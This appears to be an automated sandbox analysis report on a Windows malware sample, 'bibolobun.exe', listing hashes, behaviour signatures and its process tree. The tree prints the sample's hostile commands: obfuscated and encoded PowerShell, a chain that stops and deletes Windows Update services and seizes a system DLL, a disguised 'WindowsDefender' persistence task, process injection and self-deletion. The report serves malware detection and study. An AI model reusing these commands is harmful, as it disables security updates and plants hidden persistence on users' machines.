Analysis

  • max time kernel
    151s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    30-08-2022 08:07

General

  • Target

    bibolobun.exe

  • Size

    5.1MB

  • MD5

    2438b851e157a3f70bd48af1984b2139

  • SHA1

    105ce31ecdce604bf8629ddc6580f2ad25fc21b5

  • SHA256

    bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494

  • SHA512

    ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52

  • SSDEEP

    98304:hoJgPPz4jnKiw6qbse0KZ3U/TUpm9OMtUdvHW4i/6jUH2+9Nx40u:onKl6qgeUoSOdPZi/GUH2QX40u

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Stops running service(s) 3 TTPs
  • Deletes itself 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Drops file in System32 directory 6 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 6 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:476
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
      • Sets service image path in registry
      • Suspicious behavior: LoadsDriver
      PID:460
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
        2⤵
          PID:1032
        • C:\Windows\system32\sppsvc.exe
          C:\Windows\system32\sppsvc.exe
          2⤵
            PID:1676
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
            2⤵
              PID:1512
            • C:\Windows\system32\taskhost.exe
              "taskhost.exe"
              2⤵
                PID:1260
              • C:\Windows\System32\spoolsv.exe
                C:\Windows\System32\spoolsv.exe
                2⤵
                  PID:276
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k NetworkService
                  2⤵
                    PID:300
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs
                    2⤵
                    • Drops file in System32 directory
                    • Drops file in Windows directory
                    • Suspicious use of AdjustPrivilegeToken
                    PID:872
                    • C:\Windows\system32\taskeng.exe
                      taskeng.exe {ED8EEDD5-C421-46A5-BBB1-FD6FC5100929} S-1-5-18:NT AUTHORITY\System:Service:
                      3⤵
                      • Loads dropped DLL
                      PID:1892
                      • C:\Program Files\Platform\Defender\update.exe
                        "C:\Program Files\Platform\Defender\update.exe"
                        4⤵
                        • Executes dropped EXE
                        PID:1220
                        • C:\Windows\System32\conhost.exe
                          "C:\Windows\System32\conhost.exe" "C:\Program Files\Platform\Defender\update.exe"
                          5⤵
                          • Drops file in Drivers directory
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Drops file in Program Files directory
                          • Modifies data under HKEY_USERS
                          PID:1900
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQBsAHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBrAGQAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbABhACMAPgAgAEAAKAAgADwAIwBmAGgAegAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAZwBmAHQAaAAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKQAgADwAIwB5AG4AYgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAbwAjAD4A"
                            6⤵
                            • Drops file in System32 directory
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1488
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                            6⤵
                              PID:1668
                              • C:\Windows\system32\sc.exe
                                sc stop UsoSvc
                                7⤵
                                • Launches sc.exe
                                PID:820
                              • C:\Windows\system32\sc.exe
                                sc stop WaaSMedicSvc
                                7⤵
                                • Launches sc.exe
                                PID:1288
                              • C:\Windows\system32\sc.exe
                                sc stop wuauserv
                                7⤵
                                • Launches sc.exe
                                PID:892
                              • C:\Windows\system32\sc.exe
                                sc stop bits
                                7⤵
                                • Launches sc.exe
                                PID:1692
                              • C:\Windows\system32\sc.exe
                                sc stop dosvc
                                7⤵
                                • Launches sc.exe
                                PID:1992
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                7⤵
                                • Modifies registry key
                                PID:1288
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                7⤵
                                • Modifies registry key
                                PID:1928
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                7⤵
                                • Modifies registry key
                                PID:1100
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                7⤵
                                • Modifies registry key
                                PID:1772
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                7⤵
                                • Modifies registry key
                                PID:1068
                              • C:\Windows\system32\takeown.exe
                                takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                7⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2012
                              • C:\Windows\system32\icacls.exe
                                icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                7⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                PID:1904
                              • C:\Windows\system32\reg.exe
                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                7⤵
                                • Modifies registry key
                                PID:1160
                              • C:\Windows\system32\reg.exe
                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                7⤵
                                • Modifies registry key
                                PID:1412
                              • C:\Windows\system32\reg.exe
                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                7⤵
                                • Modifies registry key
                                PID:1356
                              • C:\Windows\system32\reg.exe
                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                7⤵
                                • Modifies registry key
                                PID:304
                              • C:\Windows\system32\schtasks.exe
                                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                7⤵
                                  PID:1476
                                • C:\Windows\system32\schtasks.exe
                                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                  7⤵
                                    PID:1904
                                  • C:\Windows\system32\schtasks.exe
                                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                    7⤵
                                      PID:468
                                    • C:\Windows\system32\schtasks.exe
                                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                      7⤵
                                        PID:1876
                                      • C:\Windows\system32\schtasks.exe
                                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                        7⤵
                                          PID:1992
                                        • C:\Windows\system32\schtasks.exe
                                          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                          7⤵
                                            PID:1360
                                          • C:\Windows\system32\schtasks.exe
                                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                            7⤵
                                              PID:1700
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                            6⤵
                                              PID:1804
                                              • C:\Windows\system32\powercfg.exe
                                                powercfg /x -hibernate-timeout-ac 0
                                                7⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1360
                                              • C:\Windows\system32\powercfg.exe
                                                powercfg /x -hibernate-timeout-dc 0
                                                7⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1220
                                              • C:\Windows\system32\powercfg.exe
                                                powercfg /x -standby-timeout-ac 0
                                                7⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1588
                                              • C:\Windows\system32\powercfg.exe
                                                powercfg /x -standby-timeout-dc 0
                                                7⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:556
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "WindowsDefender" /tr "\"C:\Program Files\Platform\Defender\update.exe\""
                                              6⤵
                                                PID:584
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "WindowsDefender" /tr "\"C:\Program Files\Platform\Defender\update.exe\""
                                                  7⤵
                                                  • Creates scheduled task(s)
                                                  PID:1068
                                              • C:\Windows\System32\dialer.exe
                                                C:\Windows\System32\dialer.exe "epzggvhm"
                                                6⤵
                                                  PID:996
                                                • C:\Windows\System32\dialer.exe
                                                  C:\Windows\System32\dialer.exe zryhtmslhfgrpc1 6E3sjfZq2rJQaxvLPmXgsBL6xjjYguHWtOpZ+stIdvtFmxXu9Su4ZmZ4m248qJKzYqn0Ua9E3eZCF6KVDnl4Om3mtJYdu2zYxf5VDSOtlwzNI2HELjSSWiBbhmq9nnQLcymNaMLbX6BcVfekXBXlHwtkdZ87kGHVBeHkhms/rlEKec4HZ9wIBVrc9Qi+y2+a3lep8HRZlmoXu5C0nH5vK2Z6XqFAlqh1P1TH9zlUlrSoi8iC8XAKUbdPgbva/qi9DzYr1RVc8QqRoXX8h4GvBaNJoiMytDP1XZ+7BxVOZddNH0XJdiGTlhqmJ6roc2xDtAY0xSKzjDUzaj6VcQ6dE4nGnXfnrH194gWO2Fle+qlRtL5DmSlHKlQNVMEwD+lLyH/56tXiuxnzEBOxWLJZa4aP8Qv/WXczd4ddilDeMPY13j7jZPu5TdLr9XBYda4edqFELpOQYd1Sl2t6HN/f/knReR0toj+9pfBIu/dyltFHYBgH8jIh3ZIp8xo/NopF9P+/CLEQGN4MNrl3tzSKPM88s7KlDiFV5IVDt9y2BSrs52V/tpdfNJYjkFjol69J
                                                  6⤵
                                                  • Executes dropped EXE
                                                  PID:1616
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                                              4⤵
                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                              • Drops file in System32 directory
                                              • Suspicious use of SetThreadContext
                                              • Modifies data under HKEY_USERS
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1532
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                                              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                                              4⤵
                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                              • Drops file in System32 directory
                                              • Suspicious use of SetThreadContext
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1468
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k LocalService
                                          2⤵
                                            PID:844
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
                                            2⤵
                                              PID:796
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                              2⤵
                                                PID:732
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k RPCSS
                                                2⤵
                                                  PID:652
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k DcomLaunch
                                                  2⤵
                                                    PID:576
                                                    • C:\Windows\system32\wbem\wmiprvse.exe
                                                      C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                      3⤵
                                                        PID:1480
                                                  • C:\Windows\system32\winlogon.exe
                                                    winlogon.exe
                                                    1⤵
                                                      PID:416
                                                      • C:\Windows\System32\dllhost.exe
                                                        C:\Windows\System32\dllhost.exe /Processid:{5c5db92f-4f9e-4ce5-b41b-b870953a6830}
                                                        2⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1020
                                                      • C:\Windows\SysWOW64\dllhost.exe
                                                        C:\Windows\SysWOW64\dllhost.exe /Processid:{c5e7a684-33e1-4a61-953c-e80758a4342e}
                                                        2⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1120
                                                    • C:\Windows\system32\lsm.exe
                                                      C:\Windows\system32\lsm.exe
                                                      1⤵
                                                        PID:484
                                                      • \\?\C:\Windows\system32\wbem\WMIADAP.EXE
                                                        wmiadap.exe /F /T /R
                                                        1⤵
                                                          PID:1088
                                                        • C:\Windows\Explorer.EXE
                                                          C:\Windows\Explorer.EXE
                                                          1⤵
                                                          • Suspicious use of FindShellTrayWindow
                                                          • Suspicious use of SendNotifyMessage
                                                          PID:1420
                                                          • C:\Users\Admin\AppData\Local\Temp\bibolobun.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\bibolobun.exe"
                                                            2⤵
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:1492
                                                            • C:\Windows\System32\conhost.exe
                                                              "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\bibolobun.exe"
                                                              3⤵
                                                              • Drops file in Drivers directory
                                                              • Suspicious use of SetThreadContext
                                                              • Drops file in Program Files directory
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:304
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQBsAHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBrAGQAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbABhACMAPgAgAEAAKAAgADwAIwBmAGgAegAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAZwBmAHQAaAAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKQAgADwAIwB5AG4AYgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAbwAjAD4A"
                                                                4⤵
                                                                • Drops file in System32 directory
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1900
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                                4⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:1376
                                                                • C:\Windows\system32\sc.exe
                                                                  sc stop UsoSvc
                                                                  5⤵
                                                                  • Launches sc.exe
                                                                  PID:664
                                                                • C:\Windows\system32\sc.exe
                                                                  sc stop WaaSMedicSvc
                                                                  5⤵
                                                                  • Launches sc.exe
                                                                  PID:1120
                                                                • C:\Windows\system32\sc.exe
                                                                  sc stop wuauserv
                                                                  5⤵
                                                                  • Launches sc.exe
                                                                  PID:1812
                                                                • C:\Windows\system32\sc.exe
                                                                  sc stop bits
                                                                  5⤵
                                                                  • Launches sc.exe
                                                                  PID:1724
                                                                • C:\Windows\system32\sc.exe
                                                                  sc stop dosvc
                                                                  5⤵
                                                                  • Launches sc.exe
                                                                  PID:268
                                                                • C:\Windows\system32\reg.exe
                                                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                                                  5⤵
                                                                  • Modifies registry key
                                                                  PID:380
                                                                • C:\Windows\system32\reg.exe
                                                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                                                  5⤵
                                                                  • Modifies registry key
                                                                  PID:1228
                                                                • C:\Windows\system32\reg.exe
                                                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                                                  5⤵
                                                                  • Modifies security service
                                                                  • Modifies registry key
                                                                  PID:1488
                                                                • C:\Windows\system32\reg.exe
                                                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                                                  5⤵
                                                                  • Modifies registry key
                                                                  PID:1664
                                                                • C:\Windows\system32\reg.exe
                                                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                                                  5⤵
                                                                  • Modifies registry key
                                                                  PID:676
                                                                • C:\Windows\system32\takeown.exe
                                                                  takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                                                  5⤵
                                                                  • Possible privilege escalation attempt
                                                                  • Modifies file permissions
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1020
                                                                • C:\Windows\system32\icacls.exe
                                                                  icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                                                  5⤵
                                                                  • Possible privilege escalation attempt
                                                                  • Modifies file permissions
                                                                  PID:2032
                                                                • C:\Windows\system32\reg.exe
                                                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                                                  5⤵
                                                                  • Modifies registry key
                                                                  PID:584
                                                                • C:\Windows\system32\reg.exe
                                                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                                                  5⤵
                                                                  • Modifies registry key
                                                                  PID:976
                                                                • C:\Windows\system32\reg.exe
                                                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                                                  5⤵
                                                                  • Modifies registry key
                                                                  PID:940
                                                                • C:\Windows\system32\reg.exe
                                                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                                                  5⤵
                                                                  • Modifies registry key
                                                                  PID:112
                                                                • C:\Windows\system32\schtasks.exe
                                                                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                                                  5⤵
                                                                    PID:1480
                                                                  • C:\Windows\system32\schtasks.exe
                                                                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                                                    5⤵
                                                                      PID:1380
                                                                    • C:\Windows\system32\schtasks.exe
                                                                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                                                      5⤵
                                                                        PID:2016
                                                                      • C:\Windows\system32\schtasks.exe
                                                                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                                                        5⤵
                                                                          PID:1096
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                                                          5⤵
                                                                            PID:1644
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                                                            5⤵
                                                                              PID:268
                                                                            • C:\Windows\system32\schtasks.exe
                                                                              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                                              5⤵
                                                                                PID:1076
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                              4⤵
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:1636
                                                                              • C:\Windows\system32\powercfg.exe
                                                                                powercfg /x -hibernate-timeout-ac 0
                                                                                5⤵
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:2044
                                                                              • C:\Windows\system32\powercfg.exe
                                                                                powercfg /x -hibernate-timeout-dc 0
                                                                                5⤵
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:1760
                                                                              • C:\Windows\system32\powercfg.exe
                                                                                powercfg /x -standby-timeout-ac 0
                                                                                5⤵
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:1732
                                                                              • C:\Windows\system32\powercfg.exe
                                                                                powercfg /x -standby-timeout-dc 0
                                                                                5⤵
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:1064
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "WindowsDefender" /tr "\"C:\Program Files\Platform\Defender\update.exe\""
                                                                              4⤵
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:588
                                                                              • C:\Windows\system32\schtasks.exe
                                                                                schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "WindowsDefender" /tr "\"C:\Program Files\Platform\Defender\update.exe\""
                                                                                5⤵
                                                                                • Creates scheduled task(s)
                                                                                PID:1212
                                                                            • C:\Windows\System32\conhost.exe
                                                                              C:\Windows\System32\conhost.exe
                                                                              4⤵
                                                                              • Executes dropped EXE
                                                                              • Drops file in Windows directory
                                                                              PID:1552
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "WindowsDefender"
                                                                              4⤵
                                                                                PID:1484
                                                                                • C:\Windows\system32\schtasks.exe
                                                                                  schtasks /run /tn "WindowsDefender"
                                                                                  5⤵
                                                                                    PID:1588
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\bibolobun.exe"
                                                                                  4⤵
                                                                                  • Deletes itself
                                                                                  PID:2012
                                                                                  • C:\Windows\system32\choice.exe
                                                                                    choice /C Y /N /D Y /T 3
